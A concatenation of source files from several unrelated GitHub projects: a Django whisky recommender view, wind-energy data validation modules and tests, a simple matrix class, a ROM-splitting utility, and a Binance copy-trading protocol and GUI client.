from .forms import StateForm
from .scotchy import *
from .models import State, Scotch, EmotionScotchSimilarity
def home(request):
# initialize emotional state
initial={'emotional_state': request.session.get('emotional_state', None)}
# do this when posted
if request.method == 'POST':
# use form to get user's emotional state
form = StateForm(request.POST)
if form.is_valid():
# save to state model
form.save()
# record emotional state
request.session['emotional_state'] = form.cleaned_data['name']
# redirect to new view showing recommendations
return redirect('results')
#return HttpResponseRedirect(reverse('results'))
else:
form = StateForm()
return render(request, 'recommendation/home.html', {'form' : form})
def results(request):
emotional_state = request.session['emotional_state']
# initiate recommendation engine
recs = RecommendationEngine()
# get scotch recommendation idx based on emotion
idx = recs.get_rec(emotional_state)
# select scotch data from SQL database
rec = Scotch.objects.get(id=idx+1)
# get summaries for recommended scotch
adjs = ast.literal_eval(Summaries.objects.get(id=idx+1).summary)
# if more than three adjectives, randomly sample three from the list
if len(adjs) > 3:
adjs = random.sample(adjs, 3)
else:
pass
if len(rec.age) > 1:
context = {'emotion' : emotional_state,
'rec1_name' : rec.name,
'rec1_age' : rec.age,
'rec1_sum' : '. '.join(adjs) + '.'}
else:
context = {'emotion' : emotional_state,
'rec1_name' : rec.name,
'rec1_sum' : '. '.join(adjs) + '.'}
return render(request, 'recommendation/results.html', context)
``` |
{
"source": "a2edap/WE-Validate",
"score": 3
} |
#### File: WE-Validate/inputs/fino2_dats.py
```python
import os
import pathlib
import pandas as pd
import numpy as np
import glob
import sys
class fino2_dats:
"""FINO2 data class
"""
def __init__(self, info, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(info['path'])
)
self.var = info['var']
# self.lev = conf['levels']['height_agl']
self.target_var = info['target_var']
def get_ts(self, lev):
"""The directory can contain multiple FINO2 files, and each file
contains data at one height level.
The function only read in one data file at one height level.
"""
file_list = glob.glob(os.path.join(self.path, '*.dat'))
for file in file_list:
if str(lev)+'m' in file:
df_all = pd.read_csv(file)
# Get variable name and column names
var_name = df_all.iloc[0][0].split(': ', 1)[1]
col_names = df_all.iloc[3][0].split('\t')[1:]
df = pd.read_csv(file, skiprows=6, sep='\s+')
# Turn column names into 1st row
df = pd.DataFrame(np.vstack([df.columns, df]))
# Combine 2 time columns, hard coded
df['t'] = df[0].map(str)+' '+df[1]
# Drop duplicating columns
df.pop(0)
df.pop(1)
# Reassign column names
for i in range(len(col_names)):
df[col_names[i]] = df[i+2]
df.pop(i+2)
df = df.set_index('t').sort_index()
df.index = pd.to_datetime(df.index)
# FINO data are averages centered at each 10-minute period
# Data between 10:30 and 10:40 are averaged and labelled as
# 10:35
# Apply correction to label data at the end of each period
# Hence data between 10:30 and 10:40 are averaged and labelled
# as 10:40
df.index = df.index+pd.Timedelta('5minutes')
# Extract only 1 column of data
out_df = df.loc[:, [self.var]]
out_df.rename(
columns={self.var: self.target_var}, inplace=True
)
out_df = out_df.astype(float)
return out_df
```
#### File: WE-Validate/inputs/pc_csv.py
```python
import os
import pathlib
import importlib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from tools import eval_tools
class pc_csv:
"""Power curve class, using power curve from a csv file."""
def __init__(self, path, file, ws, power, hhws_df, hub_height, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(path)
)
self.file = os.path.join(self.path, file)
self.ws = ws
self.power = power
# Declare hub height wind speed data frame
self.hhws_df = hhws_df
self.hh = hub_height
self.conf = conf
self.conf['reference']['var'] = self.power
self.plotting = eval_tools.get_module_class('plotting', 'plot_data')(
self.conf)
def get_power(self):
"""Convert wind speed into power using user-provided power curve."""
self.pc_df = pd.read_csv(self.file)
# Assume 0 power in the beginning
power_df = pd.DataFrame(
0, columns=self.hhws_df.columns+'_derived_power',
index=self.hhws_df.index
)
# For each dataset (i.e. each column in data frame)
for hh_col, p_col in zip(self.hhws_df.columns, power_df.columns):
# When wind speed is nan, assign power to nan
power_df.loc[np.isnan(self.hhws_df[hh_col]), p_col]\
= np.NaN
# For each wind speed (bin) in power curve
for i, row in self.pc_df.iterrows():
# Assign respective power when wind speed exceeds threshold
power_df.loc[self.hhws_df[hh_col] > row[self.ws], p_col]\
= row[self.power]
self.power_df = power_df.sort_index()
return self.power_df
def plot_pc(self):
"""Plot power curve."""
plt.plot(self.pc_df[self.ws], self.pc_df[self.power], c='k')
for hh_col, p_col in zip(self.hhws_df.columns, self.power_df.columns):
plt.scatter(self.hhws_df[hh_col], self.power_df[p_col])
plt.show()
def plot_power_ts(self):
"""Plot power time series."""
self.plotting.plot_ts_line(self.power_df, self.hh, self_units=False)
def plot_power_scatter(self):
"""Plot power scatterplot."""
self.plotting.plot_pair_scatter(self.power_df, self.hh,
self_units=False)
```
#### File: WE-Validate/inputs/wrf_netcdf.py
```python
import os
import pathlib
from datetime import datetime
from netCDF4 import Dataset
import numpy as np
import pandas as pd
from qc import check_input_data
class wrf_netcdf:
"""WRF data class, using data from NetCDF files.
Each NetCDF file should contain 1 time step of data.
"""
def __init__(self, info, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(info['path'])
)
self.var = info['var']
self.target_var = info['target_var']
self.freq = info['freq']
self.flag = info['flag']
self.loc = conf['location']
try:
self.select_method = conf['reference']['select_method']
except KeyError:
self.select_method = 'instance'
# For WRF mountain wave demo case
def get_ij(self, ih):
"""Return data index (i and j) for nc file at a specified target
location.
"""
lat = np.array(ih['XLAT'])
lon = np.array(ih['XLONG'])
# If lat/lon were arrays (instead of matrixes)
# something like this would work:
# d = np.fromfunction(lambda x,y: (lon[x] - loc['lon'])**2
# + (lat[y] - loc['lat'])**2, (len(lon), len(lat)), dype=float)
# This is most appropriate for Equator coordinates
d = (lat - self.loc['lat'])**2 + (lon - self.loc['lon'])**2
i, j = np.unravel_index(np.argmin(d), d.shape)
return i, j
def get_ts(self, lev):
"""Get time series at a location at a certain height.
Resample data according to user-defined data frequency.
"""
df = pd.DataFrame({'t': [], self.target_var: []})
# To print an empty line before masked value error messages
mask_i = 0
for file in os.listdir(self.path):
data = Dataset(os.path.join(self.path, file), 'r')
i, j = self.get_ij(data)
s = file.split('_')[2]+'_'+file.split('_')[3].split('.')[0]+':'\
+ file.split('_')[4]+':'+file.split('_')[5].split('.')[0]
t = datetime.strptime(s, '%Y-%m-%d_%H:%M:%S')
height_ind = np.where(data['level'][:].data == lev)[0][0]
u = data.variables[self.var[0]][height_ind][i][j]
v = data.variables[self.var[1]][height_ind][i][j]
ws = np.sqrt(u**2 + v**2)
ws, mask_i = check_input_data.convert_mask_to_nan(ws, t, mask_i)
ws = check_input_data.convert_flag_to_nan(ws, self.flag, t)
data.close()
df = df.append([{'t': t, self.target_var: ws}])
df = df.set_index('t').sort_index()
# Same process as in the crosscheck_ts class
time_diff = df.index.to_series().diff()
if len(time_diff[1:].unique()) == 1:
if self.freq > time_diff[1].components.minutes:
df = df.resample(
str(self.freq)+'T', label='right',
closed='right')
if self.select_method == 'average':
df = df.mean()
if self.select_method == 'instance':
df = df.asfreq()
df = check_input_data.verify_data_file_count(df, self.target_var,
self.path, self.freq
)
return df
```
#### File: WE-Validate/metrics/mae.py
```python
import numpy as np
class mae:
def compute(self, x, y):
return float(np.mean(abs(x - y)))
```
#### File: WE-Validate/metrics/test_metrics.py
```python
import importlib
import pandas as pd
import math
from tools import eval_tools
test_dir = 'metrics'
# Example data series
x_eg = pd.Series([2, 2, 2, 2, 16])
y_eg = pd.Series([4, 5, 6, -7, 8])
def read_metric(metric):
return eval_tools.get_module_class(test_dir, metric)()
def test_bias():
assert read_metric('bias').compute(5, 4) == -1
def test_series_bias():
assert read_metric('bias').compute(x_eg, y_eg) == -1.6
def test_bias_pct():
assert read_metric('bias_pct').compute(5, 4) == -20
def test_series_bias_pct():
assert read_metric('bias_pct').compute(x_eg, y_eg) == -10
def test_mae():
assert read_metric('mae').compute(5, 4) == 1
def test_series_mae():
assert read_metric('mae').compute(x_eg, y_eg) == 5.2
def test_mae_pct():
assert read_metric('mae_pct').compute(5, 4) == 20
def test_series_mae_pct():
assert read_metric('mae_pct').compute(x_eg, y_eg) == 190
def test_series_rmse():
result = read_metric('rmse').compute(x_eg, y_eg)
assert math.isclose(result, 5.899, rel_tol=1e-4)
def test_series_crmse():
result = read_metric('crmse').compute(x_eg, y_eg)
assert math.isclose(result, 5.678, rel_tol=1e-4)
``` |
{
"source": "a2evans/ProjectMM",
"score": 4
} |
#### File: ProjectMM/ProjectMM/MatrixC.py
```python
__author__ = '<NAME>'
__email__ = '<EMAIL>'
# file for the matrix class
class MatrixC:
# initialization
def __init__(self, r, c):
self.data = [[0 for q in range(0, c)]for p in range(0, r)]
self.r = r
self.c = c
# accessor
def __getitem__(self, r):
return self.data[r]
# setter
def __setitem__(self, key, value):
self.data[[key[0]][key[1]]] = value
# addition
def __add__(self, other):
if self.c and self.r is not other.c and other.r:
print("Error: incompatible size of matrices output not defined.")
return
for i in range(0, self.r):
for j in range(0, self.c):
self.data[i][j] += other.data[i][j]
return self
def __sub__(self, other):
if self.c and self.r is not other.c and other.r:
print("Error: incompatible size of matrices output not defined.")
return
for i in range(0, self.r):
for j in range(0, self.c):
self.data[i][j] -= other.data[i][j]
return self
# multiply two matrices together
def __mul__(self, other):
if self.c != other.r:
print("Error: incompatible size of matrices output not defined.")
return
matrixA = MatrixC(self.r, other.c)
# grab the row of self and column
for i in range(0, self.r):
# for every element in the row
for j in range(0, other.c):
sum = 0
for k in range(0, self.c):
sum += self.data[i][k] * other.data[k][j]
matrixA[i][j] = sum
return matrixA
# print function
def print_mc(self):
for i in range(0, len(self.data)):
print(self.data[i])
``` |
{
"source": "a2ff/splitrom",
"score": 2
} |
#### File: a2ff/splitrom/identify.py
```python
import sys, splitrom
def _usage():
print(F"usage: {sys.argv[0]} <version> <ROM dumps in order n..0, hi..lo>"); sys.exit(1)
try:
splitrom.checkFiles(sys.argv[2:])
print("\nif ROMs unidentified, add this to splitrom/known.py:")
splitrom.prettySplits(sys.argv[1], sys.argv[2:], len(sys.argv[2:])//2)
except Exception as e: print(e); _usage()
``` |
{
"source": "A2-forever/code",
"score": 3
} |
#### File: python/Hatree Fock/FUNCTION_HF1.py
```python
import numpy as np
from FUNCTION_HF2 import *
eps = 1e-6
def Get_n(file_name): #获取基函数数,alpha与beta电子数
flag=0
with open("data\\"+file_name, 'r') as f:
for line in f:
temp=line.split()
l=len(temp)
if(l<6):
continue
if(temp[1]+" "+temp[2]=="basis functions,"):
n=int(temp[0]) #基函数数
flag=flag+1
elif(temp[1]+" "+temp[2]=="alpha electrons"):
n_alpha=int(temp[0]) #alpha电子数
n_beta=int(temp[3]) #beta电子数
flag=flag+1
if(flag==2):
break
return n,n_alpha,n_beta #基函数数,alpha与beta电子数
def Get_INT(file_name,n): #获取重叠积分,核哈密顿积分以及双电子积分
S=np.mat(np.zeros([n,n]))
H=np.mat(np.zeros([n,n]))
TE_INT=np.zeros([n,n,n,n])
index=[0]*5 #Gaussian一般一行五个
count_completed = 0 #用于完成表示矩阵读取的进度,本次只需完成三个矩阵读取
count_processing=0 #用于表示正在矩阵读取的进度,本次只需完成三个矩阵读取
flag=0 #0表示本行不读取,下一个;1表示读取结束;2表示正常读取
with open("data\\"+file_name, 'r') as f:
for line in f:
if(line==" *** Overlap *** \n" ):
count_processing=1
continue
elif(line==" ****** Core Hamiltonian ****** \n"):
count_processing=2
continue
elif(line==" *** Dumping Two-Electron integrals ***\n"):
count_processing=3
continue
if(count_processing==count_completed): #表示已经读取完一个矩阵,但还未开始下一个矩阵的读取
continue #一般完成进度与正在读取进度不一样,表示正在读取,但是在每次读取的开头会有一些特殊情况
elif(count_processing==3): #正在读取双电子积分
flag=Read_TE_INT(line,TE_INT)
if(flag==1):
count_completed=3
break
elif(count_processing==1): #正在读取交叉矩阵
flag=Read_Matrix_INT(line,S,index)
if(flag==1):
count_completed=1
elif(count_processing==2): #正在读取核哈密顿矩阵
flag=Read_Matrix_INT(line,H,index)
if(flag==1):
count_completed=2
return S,H,TE_INT
def Fock_G(P,TE_INT): #基函数参数矩阵,与双电子积分数组(4维)
n=P.shape[0]
G = np.zeros_like(P)
#a=1-3j
#G=G+a
for i in range(0,n):
for j in range(0,n): #Fock矩阵G矩阵的单位元构建
for k in range(0,n):
for l in range(0,n):
G[i,j]=G[i,j]+P[l,k]*(2*TE_INT[i][j][k][l]-TE_INT[i][l][k][j])
#print(G[i][j])
return G
'''
def Write_Matrix(M,file_name): #在文件中写入二维矩阵
for i in range(0,M.shape[0]):
for j in range(0,M.shape[1]):
f.write(str(S[i,j].real)+"\t")
f.write("\n")
'''
``` |
{
"source": "a2gs/BinanceCopyTrade",
"score": 2
} |
#### File: a2gs/BinanceCopyTrade/BinanceCTProto.py
```python
from BinanceCTUtil import getTimeStamp
import json
CT_CMD_COPYTRADE = "COPYTRADE"
CT_CMD_PING = "PING"
CT_CMD_CANCELORDER = "CANCEL ORDER"
CT_CMD_GETOPENORDERS = "OPENORDERS"
CT_TYPE_RESPONSE = "RESP"
CT_TYPE_REQUEST = "REQ"
# Response RefNum (data['ret'])
CT_PROTO_RESP_OK = 0
CT_PROTO_RESP_PING = 1
CT_PROTO_RESP_BAD_PROTO = 2
CT_PROTO_COPYTRADE_ERROR1 = 3
CT_PROTO_COPYTRADE_ERROR2 = 4
CT_PROTO_COPYTRADE_ERROR3 = 5
class CT_PROTO:
cmd = ""
fromto = {'from' : "", 'to': ""}
timestamp = ""
cmdtype = ""
resp_timestamp = ""
data = object()
def __init__(self,
_cmd = "",
_fromto_from = "",
_fromto_to = "",
_timestamp = "",
_cmdtype = "",
_resp_timestamp = "",
_data = object()):
self.cmd = _cmd
self.fromto['from'] = _fromto_from
self.fromto['to'] = _fromto_to
self.timestamp = _timestamp
self.cmdtype = _cmdtype
self.resp_timestamp = _resp_timestamp
self.data = _data
def formatToNet(self)->[bool, str]:
msg = {
'cmd' : self.cmd,
'fromto' : {
'from' : self.fromto['from'],
'to' : self.fromto['to']
},
'timestamp' : self.timestamp,
'type' : self.cmdtype,
'resp_timestamp' : self.resp_timestamp,
}
msg['data'] = {}
try:
if self.cmd == CT_CMD_COPYTRADE:
if msg['type'] == CT_TYPE_REQUEST:
msg['data']['symbol'] = self.data.symbol
msg['data']['side'] = self.data.side
msg['data']['ordid'] = self.data.ordid
msg['data']['ordtype'] = self.data.ordtype
msg['data']['qtd'] = self.data.qtd
msg['data']['price'] = self.data.price
msg['data']['priceStop'] = self.data.priceStop
msg['data']['priceLimit'] = self.data.priceLimit
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
elif self.cmd == CT_CMD_CANCELORDER:
if msg['type'] == CT_TYPE_REQUEST:
msg['data'] = { 'server_order_id' : self.data.server_order_id }
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
elif self.cmd == CT_CMD_GETOPENORDERS:
if msg['type'] == CT_TYPE_REQUEST:
msg['data'] = { 'openorders' : [] }
[msg['data']['openorders'].append(i.element) for i in self.data.open_orders]
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
except Exception as e:
return([False, "Index error: {e}"])
return([True, json.dumps(msg)])
def loadFromNet(self, msgRecv):
jsonDump = json.loads(msgRecv)
self.cmd = jsonDump['cmd']
self.fromto['from'] = jsonDump['fromto']['from']
self.fromto['to'] = jsonDump['fromto']['to']
self.timestamp = jsonDump['timestamp']
self.cmdtype = jsonDump['type']
self.resp_timestamp = jsonDump['resp_timestamp']
if self.cmd == CT_CMD_COPYTRADE:
self.data = CT_PROTO_COPYTRADE_DATA()
if self.cmdtype == CT_TYPE_REQUEST:
self.data.symbol = jsonDump['data']['symbol']
self.data.side = jsonDump['data']['side']
self.data.ordid = jsonDump['data']['ordid']
self.data.ordtype = jsonDump['data']['ordtype']
self.data.qtd = jsonDump['data']['qtd']
self.data.price = jsonDump['data']['price']
self.data.priceStop = jsonDump['data']['priceStop']
self.data.priceLimit = jsonDump['data']['priceLimit']
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
elif self.cmd == CT_CMD_CANCELORDER:
self.data = CT_PROTO_CANCELORDER_DATA()
if self.cmdtype == CT_TYPE_REQUEST:
self.data.server_order_id = jsonDump['data']['server_order_id']
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
elif self.cmd == CT_CMD_GETOPENORDERS:
self.data = CT_PROTO_GETOPENORDERS()
if self.cmdtype == CT_TYPE_REQUEST:
# TODO: copy data set
pass
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
else:
self.data = None
class CT_PROTO_CANCELORDER_DATA:
server_order_id = ""
def __init__(self, _server_order_id = ""):
self.server_order_id = _server_order_id
class CT_PROTO_GETOPENORDERS_INFO:
element = {
'symbol' : "",
'ordid' : "",
'side' : "",
'ordtype' : "",
'price' : "",
'server_order_id_ref' : ""
}
def __init__(self, _symbol = "", _ordid = "", _side = "", _ordtype = "", _price = "", _server_order_id_ref = ""):
self.element['symbol'] = _symbol
self.element['ordid'] = _ordid
self.element['side'] = _side
self.element['ordtype'] = _ordtype
self.element['price'] = _price
self.element['server_order_id_ref'] = _server_order_id_ref
class CT_PROTO_GETOPENORDERS:
open_orders = []
def __init__(self):
self.open_orders = []
class CT_PROTO_COPYTRADE_DATA:
symbol = ""
side = ""
ordid = ""
ordtype = ""
qtd = ""
price = ""
priceStop = ""
priceLimit = ""
def __init__(self, _symbol = "", _ordid = "", _side = "", _ordtype = "", _price = "", _qtd = "", _priceLimit = "", _priceStop = ""):
self.symbol = _symbol
self.ordid = _ordid
self.side = _side
self.ordtype = _ordtype
self.qtd = _qtd
self.price = _price
self.priceStop = _priceStop
self.priceLimit = _priceLimit
def __str__(self):
return(f"Symbol {self.symbol}|OrderId {self.ordid}|Side {self.side}|Qtd {self.qtd}|Type {self.ordtype}|Price {self.price}|StopPrice {self.priceStop}|LimitPrice {self.priceLimit}")
class CT_PROTO_RESPONSE:
ret = 0
retmsg = ""
def __init__(self, _ret : int = 0, _retmsg : str = ""):
self.ret = _ret
self.retmsg = _retmsg
def dumpCmdToLog(dumpCmd : CT_PROTO, log):
log(f"Command...........: [{dumpCmd.cmd}]")
log(f"From..............: [{dumpCmd.fromto['from']}]")
log(f"To................: [{dumpCmd.fromto['to']}]")
log(f"Type..............: [{dumpCmd.cmdtype}]")
log(f"Timestamp.........: [{dumpCmd.timestamp}]")
log(f"Response timestamp: [{dumpCmd.resp_timestamp}]")
log("Data:")
if dumpCmd.cmd == CT_CMD_COPYTRADE:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
log(f"\tSymbol....: [{dumpCmd.data.symbol}]")
log(f"\tSide......: [{dumpCmd.data.side}]")
log(f"\tId........: [{dumpCmd.data.ordid}]")
log(f"\tQtd.......: [{dumpCmd.data.qtd}]")
log(f"\tType......: [{dumpCmd.data.ordtype}]")
log(f"\tPrice.....: [{dumpCmd.data.price}]")
log(f"\tStopPrice.: [{dumpCmd.data.priceStop}]")
log(f"\tLimitPrice: [{dumpCmd.data.priceLimit}]")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_PING:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
log("\tTODO 1...")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_CANCELORDER:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
log(f"\tServer order id: [{dumpCmd.data.server_order_id}]")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_GETOPENORDERS:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
def printOpenOrder(log, n, order):
log(f"\t{n}) Symbol..........: [{order['symbol']}]")
log(f"\tOrder id...........: [{order['ordid']}]")
log(f"\tSide...............: [{order['side']}]")
log(f"\tOrder type.........: [{order['ordtype']}]")
log(f"\tPrice..............: [{order['price']}]")
log(f"\tServer order id ref: [{order['server_order_id_ref']}]")
[printOpenOrder(log, n, i.element) for n, i in enumerate(dumpCmd.data.open_orders, 1)]
else:
log("Unknow data structure for this cmd type.")
else:
log("Unknow data structure for this cmd.")
'''
aaa = CT_PROTO(
_cmd = "aaa",
_fromto_from = "bbb",
_fromto_to = "ccc",
_timestamp = "ddd",
_cmdtype = "eee",
_resp_timestamp = "fff")
aaa.data = CT_PROTO_COPYTRADE_DATA( _symbol = "xxx", _ordid = "yyy", _side = "zzz", _ordtype = "qqq", _price = "www")
print(aaa.data)
'''
```
#### File: a2gs/BinanceCopyTrade/BinanceCTUtil.py
```python
from datetime import datetime
def getTimeStamp()->str:
return(datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))
```
#### File: a2gs/BinanceCopyTrade/CopyTrade_Manual.py
```python
from os import getenv, getpid
from sys import exit, argv
from textwrap import fill
import configparser
import logging
import PySimpleGUI as sg
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
import BinanceCTDB
import BinanceCTUtil
import CopyTrade_Manual_Util
if len(argv) != 2:
print(f"Usage:\n\t{argv[0]} CFG_FILE.cfg")
exit(1)
con = None # Socket: signal source
ctmDB = None # Database handle
def safeExit(num : int = 0, msg : str = ""):
if ctmDB is not None:
ctmDB.DB.commit()
ctmDB.DB.quit()
if msg != "":
logging.info(msg)
logging.info(f"Exit with code [{num}]")
exit(num)
# --- CFG ---------------------------------
try:
cfgFile = configparser.ConfigParser()
cfgFile.read(argv[1])
ctm_name = cfgFile['GENERAL']['name']
ctm_log = cfgFile['GENERAL']['log']
ctm_enable = cfgFile['GENERAL']['copytrade_enable']
ctm_theme = cfgFile['GENERAL']['theme']
binance_apikey = cfgFile['BINANCE']['apikey']
binance_sekkey = cfgFile['BINANCE']['sekkey']
binance_recvwindow = cfgFile['BINANCE']['recvwindow']
signalSource_port = cfgFile['SIGNAL_SOURCE']['port']
signalSource_address = cfgFile['SIGNAL_SOURCE']['address']
db_engine = cfgFile['DB']['engine']
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
db_file = cfgFile['DB']['file']
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
db_user = cfgFile['DB']['user']
db_pass = cfgFile['DB']['pass']
db_port = cfgFile['DB']['port']
db_schema = cfgFile['DB']['schema']
else:
print("Undefined DB engine config!", file=stderr)
exit(1)
except Exception as e:
print(f"Invalid cfg file! [{e}]")
exit(1)
del cfgFile
# --- LOG ---------------------------------
try:
logging.basicConfig(filename = ctm_log,
level = logging.INFO,
format = '%(asctime)s %(message)s',
datefmt = '%Y%m%d %H%M%S')
except:
print(f"Erro open log file: [{pub_log}]", file=stderr)
exit(1)
# --- PRINT CFG ---------------------------
logging.info(f"Starting at: [{BinanceCTUtil.getTimeStamp()}] PID: [{getpid()}]")
logging.info('Configuration:')
logging.info(f"Name.....................: [{ctm_name}]")
logging.info(f"Copy Trade enable........? [{ctm_enable}]")
logging.info(f"Theme....................: [{ctm_theme}]")
logging.info(f"Signal Send port.........: [{signalSource_port}]")
logging.info(f"Signal Send address......: [{signalSource_address}]")
logging.info(f"Binance API..............: [{binance_apikey}]")
logging.info(f"Binance Recv windows.....: [{binance_recvwindow}]")
logging.info(f"DB Engine................: [{db_engine}]")
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
logging.info(f"DB File..................: [{db_file}]")
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
logging.info(f"DB User..................: [{db_user}]")
logging.info(f"DB Port..................: [{db_port}]")
logging.info(f"DB Schema................: [{db_schema}]")
# --- BINANCE CONNECTION ------------------
try:
client = Client(binance_apikey, binance_sekkey, {"verify": True, "timeout": 20})
except BinanceAPIException as e:
safeExit(1, f"Binance API exception: [{e.status_code} - {e.message}]")
except BinanceRequestException as e:
safeExit(1, f"Binance request exception: [{e.status_code} - {e.message}]")
except BinanceWithdrawException as e:
safeExit(1, f"Binance withdraw exception: [{e.status_code} - {e.message}]")
except Exception as e:
safeExit(1, f"Binance connection error: {e}")
# --- DATABASE ----------------------------
ctmDB = BinanceCTDB.CT_DB(_engine = db_engine, _sqliteDBFile = db_file)
ret, retmsg = ctmDB.DB.connect()
if ret == False:
logging.info(f"Error opening database: [{retmsg}]")
exit(1)
ret, retmsg = ctmDB.DB.createTablesIfNotExist()
if ret == False:
safeExit(1, f"Error creating tables: [{retmsg}]")
# -----------------------------------------
if ctm_enable == "YES":
CopyTrade_Manual_Util.setCopyTradeEnable(True)
else:
CopyTrade_Manual_Util.setCopyTradeEnable(False)
loggging.info("Copy trade disable by config file")
CopyTrade_Manual_Util.setSrvSendInformation(signalSource_address, int(signalSource_port), ctm_name)
STATUSBAR_WRAP = 100
menu = [
[ '&Menu', ['Info', 'Config', '---', 'Read cfg', 'Write cfg', 'Create Empty Cfg file', '---', 'Exit']],
[ '&Account', ['Infos acc', 'Taxes']],
[ '&Order', ['BUY', ['B Spot Market', 'B Spot Limit','B Spot Stop Limit', '!B Spot OCO', '---', 'B Margin Market', 'B Margin Limit', 'B Margin Stop Limit', '!B Margin OCO'],
'SELL', ['S Spot Market', 'S Spot Limit','S Spot Stop Limit', '!S Spot OCO', '---', 'S Margin Market', 'S Margin Limit', 'S Margin Stop Limit', '!S Margin OCO'], '!CANCEL', 'LIST or DELETE Open', '!LIST All']],
[ '&Binance', ['Infos binance', 'Assets', 'Symbols']]
]
layout = [
[sg.Menu(menu)],
[sg.Button('Spot Market' , key='BTTN_BSM' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Market' , key='BTTN_SSM' , button_color=('black', 'red'), size=(30,1))],
[sg.Button('Spot Limit' , key='BTTN_BSL' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Limit' , key='BTTN_SSL' , button_color=('black','red'), size=(30,1))],
[sg.Button('Spot Stop Limit' , key='BTTN_BSSL', button_color=('black','green'), size=(30,1)), sg.Button('Spot Stop Limit' , key='BTTN_SSSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Spot OCO' , disabled=True, key='BTTN_BSO' , button_color=('black','green'), size=(30,1)), sg.Button('Spot OCO' , disabled=True, key='BTTN_SSO' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Market' , key='BTTN_BMM' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Market' , key='BTTN_SMM' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Limit' , key='BTTN_BML' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Limit' , key='BTTN_SML' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Stop Limit', key='B<KEY>', button_color=('black','green'), size=(30,1)), sg.Button('Margin Stop Limit', key='BTTN_SMSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Margin OCO' , disabled=True, key='BTTN_BMO' , button_color=('black','green'), size=(30,1)), sg.Button('Margin OCO' , disabled=True, key='BTTN_SMO' , button_color=('black','red'), size=(30,1))],
[sg.Button('LIST or DELETE Open Orders', key='BTTN_LDOO')],
[sg.Button('CLOSE', key='BTTN_CLOSE')],
[sg.StatusBar('Last msg: Initialized', key='LASTMSG', size=(250, 3), justification='left')],
]
sg.theme(ctm_theme)
#sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)
window = sg.Window('Binance Status GUI', layout, size = (600, 400)).Finalize()
while True:
event, values = window.read() #timeout=1000)
if event == sg.WIN_CLOSED or event == 'Exit' or event == 'BTTN_CLOSE':
break
elif event == "Infos":
sg.popup('INFOS')
elif event == 'Info':
pass
elif event == 'Config':
pass
elif event == 'Infos acc':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.printAccountInfo(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'Taxes':
pass
# 'B Spot Market'
elif event == 'BTTN_BSM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotMarket(client, 'green', 'Buy Spot Market', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot Limit'
elif event == 'BTTN_BSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotLimit(client, 'green', 'Buy Spot Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot Stop Limit'
elif event == 'BTTN_BSSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotStopLimit(client, 'green', 'Buy Spot Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot OCO'
elif event == 'BTTN_BSO':
pass
# 'B Margin Market'
